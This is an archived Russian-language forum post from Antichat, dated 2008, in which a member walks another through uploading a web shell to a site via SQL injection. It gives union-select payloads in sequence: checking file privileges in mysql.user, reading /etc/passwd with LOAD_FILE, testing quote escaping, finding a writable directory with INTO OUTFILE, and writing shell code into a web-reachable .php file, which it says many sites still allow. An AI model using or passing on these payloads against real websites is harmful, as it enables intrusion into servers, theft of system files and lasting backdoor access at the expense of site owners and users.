ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

14.11.2008, 14:51
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от Tigger
Есть ли все из тобою перечисленного есть, то шелл зальется? А сейчас такие сайты остались? - просто я не встречал... а путь к таблице обязательно нуежен))?
Ответь, пожалуйста на все вопросы)
1 Файл прив
Проверям либо так :
union+select+file_priv+from+mysql.user+where+user= 'имя юзера под которым у тебя база' тоесть user()
Либо так:1+union+select+1,2,3,4,LOAD_FILE('/etc/passwd')/* <-- сдесь убиваем сразу двух зайцев, если файл читается, значит ковычки не экранируются
Ковычки можно проверить так-же вот как:
1+union+select+1,'2',3,4/*
если вывод есть, всё нормально
2 Далее, директория на запись:
1+union+select+1,2,3,4,'11111'+from+table+into+out file+'/bla/bla/site.ru/bla/111.txt'/*
(указывать +from+table нужно только для старых версий мускула)
Затем обращаемся к файлу через веб:
http://site.ru/bla/111.txt
и если видим наше 11111, то всё хорошо, дирректория доступна на запись.
3 Ну и собственно льём.
1+union+select+1,2,3,4,'код шелла'+from+table+into+outfile+' /bla/bla/site.ru/bla/111.php'/*
Шелл по адресу http://site.ru/bla/111.php
Сейчас такие сайты конечно-же остались, просто их мало 
Последний раз редактировалось jokester; 14.11.2008 в 15:17..
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|